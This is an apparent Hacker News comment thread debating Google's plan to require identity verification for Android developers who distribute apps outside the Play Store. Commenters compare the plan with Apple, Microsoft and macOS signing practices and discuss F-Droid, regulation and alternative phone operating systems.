> Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store
This is absolutely unacceptable. That's like you having to submit your personal details to Microsoft in order to just run a program on Windows. Absolutely nuts and it will not go as they think it will.
wvenable · 2h ago
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
dhx · 56m ago
As an example of government regulation driving this change, see [1].
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
I don't know that it's that simple. Further down that section (1920) in reference [1] reads
"(3) A dedicated encrypted criminal communication device does not include--
(a) a device if--
(i) the device has been designed, modified or equipped with software or security features, and
(ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"
It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.
dkarl · 34m ago
> applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection
Does the jurisdiction matter? For example, if an activist was using a device to do things in another country that would be legal in Australia but were crimes in the other country.
bloomca · 2h ago
Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all. They understand that as well.
They tried to pull a similar move with WinRT/UWP, but nobody wanted it, so now you can continue with Win32.
They would love to do so, but legacy compatibility is a major business advantage.
wvenable · 1h ago
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
donmcronald · 1h ago
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
georgemcbay · 6m ago
> there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
autoexec · 1h ago
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
pdntspa · 24m ago
Was it? WOW64 runs 32-bit software fine enough. Or are you talking about 16-bit applications?
ethbr1 · 1h ago
MS is now competing against businesses that see their users as profit centers. (Google, Meta, Apple)
Windows was never going to go another way than this.
Users who care about hardware and/or software freedom should be on linux.
numpad0 · 1h ago
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
dafelst · 1h ago
Microsoft basically already has this (and has for the last ~20 years) as SmartScreen.
reactordev · 30m ago
When was the last time you opened your start menu?
RedComet · 2h ago
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
steve_taylor · 1h ago
Granny can get scammed using Anydesk, available on Google Play.
yupyupyups · 38m ago
Imagine that metaphorical granny that in an instant catches fire and turns into ash if the governments and large corporations don't have complete control over our lives.
What a lovely granny that totally exists.
imhoguy · 16m ago
My mother in law is constantly worried by some Google Ads in random apps that her phone is hacked...
Gigachad · 1h ago
I suspect it's not grandma getting scammed by APKs, but people installing cracked versions of spotify/youtube/paid games.
fn-mote · 1h ago
> cracked versions of spotify/youtube/paid games
This doesn't make much sense to me.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
miki123211 · 39s ago
Those "cracked" versions often require extra permissions.
My favorite was a local "discover which of your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
867-5309 · 43m ago
no, cracked as in the ad-free premium versions, without paying for them
campground · 59s ago
This is the year of Linux on the Desktop!
rafark · 52m ago
> This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
I would say it’s really 50% platform control, 50% government regulation.
chmod775 · 22m ago
> I predict Windows will end up going this route before Google backtracks on it.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerable driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely on things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
martin-t · 2h ago
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
echelon · 1h ago
I just want to say:
I am so sick of Google.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
Sincerely.
autoexec · 1h ago
> I hope the DOJ/FTC split Google into a dozen companies.
There's no chance of that under the current regime. It loves bribery and Google has the money to get whatever they want.
actionfromafar · 2h ago
control=surveillance
autoexec · 1h ago
control is the entire point of the surveillance
Y_Y · 2h ago
This whole thing is getting totally out of surveillance!
Someone should hit surveillance-alt-delete!
Kim_Bruning · 2h ago
I never really got into "phone" programming, always waiting for the shenanigans to die down. But somehow the shenanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
donmcronald · 2h ago
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
worldsayshi · 2h ago
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
donmcronald · 1h ago
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
brailsafe · 39m ago
> I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
saganus · 2h ago
Money is a powerful motivator. For better or worse.
rmah · 1h ago
Software distribution control didn't start with phones, it started with game consoles.
lawlessone · 2h ago
i made and released some apps in the early days. Got tired of it and got tired of the reminders from google to add banners, screenshots, submitting icons to support multiple resolutions.. notifications that apps i haven't touched in decade are no longer compatible etc.
so much extra work involved that isn't building the app.
I worry how this will affect fdroid etc.
mid-kid · 3h ago
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a google-approved one, and alternatives still are decades behind in terms of app ecosystem.
I think they might just get away with it.
donmcronald · 2h ago
Don’t worry though, the TPM requirements in everything are for your protection.
cesarb · 2h ago
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
SpaghettiCthulu · 2h ago
If you don't mind sharing, which country is that?
Y_Y · 2h ago
It takes less time to search and find that Anatel is the Brazilian telecom agency than it does to type that comment.
They do marvellous things like mandate weird Brazilian Android games on the phone I bought in Brazil.
ripdog · 1h ago
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
_aavaa_ · 1h ago
Imagine asking someone where they’re from only to be told a US state, and only the state.
Y_Y · 1h ago
Apart from Georgia, I don't see how this could be a problem
nozzlegear · 1h ago
Asking where somebody's from and having them respond with the state is not unreasonable -- you can already tell they’re American from the accent. The US is huge, about half of its states have more land area than half of the countries in the world. Asking where someone is from and receiving "the US" in response is about as informative as someone from Europe replying "Europe". Like yeah, obviously, I could tell by your accent, but where in Europe?
watersb · 1h ago
> Imagine asking someone where they’re from only to be told a US state, and only the state.
Atlanta or Tbilisi?
Vvector · 2h ago
When I google ANATEL, it comes up as Brazil
chasil · 2h ago
Unless they give F-Droid access, the antitrust prosecution will double.
rpdillon · 1h ago
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
OkGoDoIt · 36m ago
And go where? iOS is worse as far as openness and controlling your own hardware. And the Linux phones are not exactly practical for normal use.
rpdillon · 20m ago
If I can't run F-Droid and termux and all that, I have no need for Android's supposed freedom. I'll just use an iPhone (it would be the first time!), minimize my use of mobile platforms to the maximum extent I can and stick with Linux laptops.
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
glenstein · 1h ago
I rely on fdroid and am not sure what I'll do with this pixel 6a. I sometimes root, sometimes don't but I may have to get on the lineageos program full time. And I'm hoping for a rumored last batch of pinephone pro phones to be available later this month although I have no illusions about it being a real daily driver.
stockresearcher · 54m ago
fdroid is based in the EU and the Cyber Resilience Act was already going to force them to either make their filters more strict (absolutely prohibit anything with any sort of "monetization"), or start collecting this data.
If they have anything on the platform that is subject to the CRA, they are a distributor:
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
cyberax · 18m ago
An unofficial build of Android, like Grapheneos. It likely won't be able to install apps from the Play Store, but at that point it might be a blessing.
ocdtrekkie · 2h ago
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases have already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
actionfromafar · 2h ago
Maybe they gave a political donation?
ahartmetz · 30m ago
It may also help to push things one way to prevent them from going the other way.
jojobas · 2h ago
I don't think Google can be blamed for this - their own phones are one of the last which can still be unlocked.
mid-kid · 1h ago
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
ChadNauseam · 2h ago
true, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. unfortunately, with the 10 series pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs
r1ch · 2h ago
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
I really wish Microsoft made it cheaper to get a certificate. With Apple you pay $100 a year for any number of certs. Last I looked into it a cert for a single Windows app costs $400+ per year and requires a hardware token.
kiicia · 1h ago
Code signing by pseudonymous key is different than a requirement to cede personal data to a central registry
ozim · 1h ago
Code signing is somewhat OK as I can get code signing cert using provider in my country that I can go to physically and show their employee my ID.
If google does that then it’s not the worst.
Worst is having to get my ID and all details scanned and processed by Google.
al_borland · 1h ago
> will not go as they think it will.
How will it go? Where are people going to go? People who draw a hard line on this can’t go to iOS for more freedom. Linux phones aren’t ready for prime time. So what’s left? Going back to a flip phone that doesn’t even have the capability of running apps in the same class?
baby · 1h ago
They did it the right way for a very long time and yet people keep buying iPhones, I think I would do the same if I were them, users clearly don't seem to care about openness and freedom to use their devices however they want. I mean, people care about the color of archaic text messages. There is nothing to save.
pier25 · 56m ago
Android has like 70-80% global market share.
reissbaker · 25m ago
And none of that (sadly) is about openness. It's about price. The iOS share of mobile spending is basically the inverse: ~70% iOS, ~30% Android.
bloomca · 2h ago
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
autoexec · 1h ago
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
int_19h · 1h ago
Microsoft does the same exact thing with SmartScreen, except that it has a whitelist for popular binaries.
tomsmeding · 2h ago
Is the right-click -> Open workaround not a thing any more on macOS?
thebitstick · 2h ago
Open -> Click away the error message -> Settings -> Privacy & Security -> Open Anyways -> Open Anyways -> Authenticate -> app actually opens
bithaze · 1h ago
There's a ctrl+open shortcut, if I remember correctly, which may be what the parent comment is referring to.
rpdillon · 1h ago
Nope, they've been making it steadily more difficult with each release. The control open shortcut no longer works.
soxfox42 · 1h ago
As of macOS 15 (I think?), that shortcut stopped working, it will just show the same unverified software warning.
sneak · 37m ago
It requires a trip to a submenu in the Settings app now. You can’t do it simply or easily.
akst · 1h ago
Ultimately it’s them that has market power.
To meaningfully challenge it, developers need to agree to withhold supply like a cartel (illegal?) or union.
I think it’s probably close to the union scenario in an industry with a single employer, as there is that one-to-many relationship (all developers vs Google). Whereas a cartel is a few suppliers conspiring against all consumers.
I’m not sure developers would go to those lengths, and I’m not sure it would work either as the benefit is too high from defecting from such a coalition.
faangguyindia · 1h ago
Doesn't macOS also require this when you use stuff like keychain in apps? I remember signing my flutter macOS app with my info using xcode.
He was unable to suggest any pragmatic alternatives. He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
The real heroes are the people that facilitate alternatives, not those who talk, and Stallman was of the talking variety.
aleph_minus_one · 12m ago
> He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
yupyupyups · 1m ago
Sure, now how do you help people who rely on Android/iPhones for communications, maps, banking, and more to protect their freedom?
sltkr · 3h ago
This is what Apple already does, isn't it? Why wouldn't it work for Google too?
indrora · 2h ago
Apple requires you to get a developer account with them.
Nowhere does that require you to go and get a DUNS number, which is onerous for a single developer to do without the infrastructure of a company.
tensor · 12m ago
FWIW I got a DUNS number through apple as a single developer for a corp. It was super easy. If you've already gone through the trouble of setting up a corp, getting the DUNS is trivial by comparison.
andyferris · 2h ago
Never heard of DUNS. It seems to be a US company (Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangladesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
aerostable_slug · 1h ago
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out there, but it makes sense given their apparent goal.
o11c · 1h ago
That would be a reasonable argument if it weren't the world's biggest malware vendor doing this.
srcreigh · 31m ago
I'll take some downvotes too. Google software is malware by all definitions of the word. Exfiltration of personal data, unauthorized access and control of personal devices. Data loss when your account gets banned. Deceptive prompts and messaging. They promote SEO spam sites which contain MBs of javascript showing you ads that make them money while you pay for the electricity cost.
They do a lot of other horrible things too, they could expand the definition of malware.
Dragon0 · 1h ago
I've had a business get listed on DUNS; once you're on it, they resell your data forever.
hotstickyballs · 1h ago
It’s not just Apple, lots of federal programs in US require a DUNS number.
watersb · 1h ago
To be clear, Apple does not require a DUNS number for developer registration.
cyanydeez · 2h ago
Yeah, basically this is the rise of computer-credit agencies.
You can see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both its appearance on the app store and any developer who'd program similar.
llm_nerd · 2h ago
While the linked article notes that organizations require a DUNS number seemingly as an aside, personal accounts do not.
Which is exactly the same policy as Apple.
didibus · 2h ago
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
jonny_eh · 1h ago
> For me the difference is that Android is an open-source operating system
Google Play is not open source. You're still free to sideload on phones that use vanilla open-source android like the Fairphone.
teleforce · 1h ago
>Absolutely nuts and it will not go as they think it will.
Apple will disagree, and is the first company doing worse than this, and is the world's first trillion-dollar company.
Money talks.
altairprime · 2h ago
Ah, then it would be acceptable if an independent third party who does not share data with Google other than Boolean yes/no was used to do this. I expect that’s their long-term plan anyways, to defuse the predictable backlash and externalize the problem and liabilities altogether, once the initial ID harvesting is done.
ozim · 1h ago
I think google has incentive to get that data for themselves so they won’t give that up.
One of those would be in corrupt countries you don’t have the „trusted 3rd party”
cellular · 2h ago
Someone create a website to emulate apk!
asdff · 2h ago
Why would it not go as they think it will? The big guy always wins against the little guy. The fact they make this move suggest they know it is a sure bet.
tgsovlerkhgsel · 3h ago
The problem here is that the EU, which would normally be the only hope to put a stop to bullshit like this, seems to like this.
dwarksidle · 2h ago
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
maxerickson · 2h ago
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
error503 · 2h ago
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
maxerickson · 2h ago
> Why should I be forced to trust Google or Apple.
You are not.
It's certainly convenient in this modern world to pay for and use one of their devices though.
plst · 14m ago
You are forced to trust Google or Apple if you want a smartphone. They own the whole market, it's a duopoly. You already have no power to install an OS without such limitations on most smartphones.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
error503 · 1h ago
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
dzhiurgis · 1h ago
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
hotstickyballs · 1h ago
I’m willing to sacrifice your rights if it means that there’s less incentive to steal my phone
greazy · 2h ago
I'd argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See Windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
plst · 7m ago
But this is not about device integrity.
I'm all for code signing and integrity verification. We need both technologies on pretty much all devices.
You are just conflating two different issues - side loading has nothing to do with device integrity.
Kim_Bruning · 2h ago
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
anticrymactic · 2h ago
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
In what way? Seriously, what benefit is there? (And don't say security...)
3836293648 · 1h ago
Not having social media?
The world would be a much better place if we only had calls and direct messages.
craftkiller · 58m ago
Bro, you forbade exactly the reason this is good for average users. Average users get emails that say:
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
gumby271 · 32m ago
Damn we should just give up on this whole computer thing outright then, seems pretty dangerous. There are plenty of other things we could strip away that would make people much safer than just installing software, that's thinking small!
craftkiller · 7m ago
Stripping away computers entirely would have significant negative impacts. For the *average user*, preventing them from side-loading unsigned apps will have no negative impact.
lucb1e · 2h ago
They're happy in their walled garden, until they aren't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
marcosdumay · 1h ago
> For the average user, device integrity is more valuable (by a lot) than side loading.
Right until their devices start to act against their will.
The device integrity you are talking about is integral only to Google and Apple. Not to you.
hn_acc1 · 1h ago
Agreed. Most people don't care that they can't run "unauthorized app XYZ", as long as their bank account / vacation pics / texts don't leak.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
EarlKing · 2h ago
Then they should go buy a boomerphone that can make calls and text and nothing else and stop screwing things up for the rest of us.
Aeolun · 2h ago
Average users also benefit from restricting their ability to purchase alcohol or tobacco, but I don’t see anyone suggesting that…
blep-arsh · 1h ago
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
imiric · 2h ago
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that don't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
pessimizer · 2h ago
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
maxerickson · 22m ago
You say this as if the widespread embrace of Apple/locked down Android phones is meaningless, fully a bamboozle with no user choice reflected at all.
incompatible · 1h ago
The EU is some kind of Jekyll and Hyde entity, you can never be sure which way it will go next.
int_19h · 58m ago
EU loves regulation. And it's much easier to regulate things when there are a few large providers that can be mandated to enforce your laws.
TZubiri · 1h ago
Android is much more secure than Windows (its architecture was developed decades later from learned lessons)
So yeah, it's different and more secure
globalnode · 1h ago
won't it just open the door for alternatives? linux on pc and ??? on mobile?
Pxtl · 40m ago
Uh, you kind of already do if you don't want to get the scary "unknown publisher" thing, which hides the "yes, I really want to install it" inside the "more info" box. Not even the decency of an "advanced" button.
Installer software signing certificates that will satisfy MS are prohibitively expensive for hobbyists (hundreds per year).
ikiris · 2h ago
You do realize windows already does this right?
bradford · 1h ago
Can you explain in what way Windows already does this?
harikb · 2h ago
So long as they don't make it very hard to get an ID approval, I don't see why people shouldn't know who developed an app.
Currently the entire ecosystem is riddled with malware, spyware, or adware with shady source information and people have no way to verify the data practices
Ms-J · 3h ago
This is the worst thing to happen to technology in recent times since there is only two major phone OS's.
It isn't possible to ban encryption, so the governments have to chip away at security and privacy using these techniques.
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
tokioyoyo · 2h ago
> This won't end well for Google or the governments involved when the people get so angry
The amount of people this makes angry is so minuscule that it probably wouldn’t even pass one of those theatrical “sign this petition to get the government to discuss it” thingy. Mind you, the only reason the whole side-loading court cases were going forward is because a giganormous company (Epic) wanted to make more money instead of paying the Google/Apple tax. Not because some people were angry.
lukeschlather · 37m ago
This is a lot more complicated than that. I'm not sure how I feel about the demand for government ID. The demand for money that comes with the app stores I find to be a problem and so does the EU, that was a big point of the DMA. It remains to be seen how those regulations play out. Maybe the DMA won't do what I want. But the DMA seems to be aimed at this sort of thing, even if it actually has the same sort of requirements around government ID, it does require openness.
e-clinton · 36m ago
In this instance, quantity isn’t as important. The people it upsets are a loud bunch with a great deal of influence.
crisdias · 2h ago
Yeah. "People" don't care.
wvenable · 2h ago
> This is the worst thing to happen to technology in recent times since there is only two major phone OS's.
I don't think that's it. The desktop OS situation has historically been similar with 2 major large players and a bunch of insignificant ones.
This comes down to user expectation.
jayofdoom · 1h ago
No, it's not similar.
There are two OS platforms for desktop/laptop usage:
MacOS
Windows
These both contain ways to run arbitrary compiled code from an arbitrary source -- like a computer should. Losing this feature of our smartphones should have everyone concerned.
wvenable · 1h ago
Right. The OP's point was that just having 2 major OSes is the problem but it's clearly not because we had that situation with desktops/laptops and they both allow arbitrary code.
bluescrn · 1h ago
> These both contain ways to run arbitrary compiled code from an arbitrary source
And they're both working towards taking that away.
For now we have Linux as a 3rd option, but that only exists so long as there's hardware available that'll let you run it. Can easily imagine a near-future where you can only get 'Windows hardware' or 'Apple hardware' and nothing modern that'll boot a 3rd-party OS.
bpye · 55m ago
Is that really realistic? Apple very specifically allowed booting unsigned, and even non macOS, operating systems on their ARM devices. Sure - they don’t document the hardware, but making it possible was intentional.
wvenable · 28m ago
Yes, making it possible was intentional. But it just goes to show how easy it would be for them to remove that option. While they are currently specifically choosing not to do that for their own hardware, they could change their mind tomorrow.
For precedent, Microsoft locked down their own ARM hardware to Windows.
maxerickson · 2h ago
What's wrong with loading an alternate OS that isn't Play Protect certified?
buildfocus · 2h ago
Attestation & Play Integrity is having a good go at blocking this: lots of critical software (e.g. the app required to use your bank account) requires certified attested devices, and Google are pushing hard to get as many apps as possible to activate that for "security", making non-Google Android unfixably 2nd tier in functionality.
bsimpson · 2h ago
Doesn't GNU/Linux also have this problem with e.g. Netflix? If you don't pass their spyware, you get shitty streams from video apps and no access to financial accounts.
MrMember · 35m ago
My HTPC runs Linux and when I had Amazon Prime I tried to stream a live event and it wouldn't let me stream it at all. I don't have Prime anymore.
uz3snolc3t6fnrq · 1h ago
ironically, making linux users consider sailing the high seas for actual 4k rips instead of actually paying for the service just to get blocky low bitrate 720p content. so this piracy prevention not only creates more potential pirates, but makes paying customers' lives harder while not affecting the aforementioned pirates, who can now watch it at 4k on any device or program they wish
glenstein · 1h ago
>and Google are pushing hard to get as many apps as possible to activate that for "security"
I'd be interested in further reading on Google's outreach to big banks and major finance CO's ( or others) pushing for device attestation if you have any further reading.
terminalbraid · 2h ago
Most vendors, including the big ones, don't play well with that. Google just revoked open sourcing the Pixel as the reference design which was the strongest option for that. Things like newer Samsungs are black boxes and everyone is actively making it harder to do anything with devices you bought and paid for.
sanex · 2h ago
Soon you won't be able to do this either because most manufacturers are locking down the bootloader.
kotaKat · 2h ago
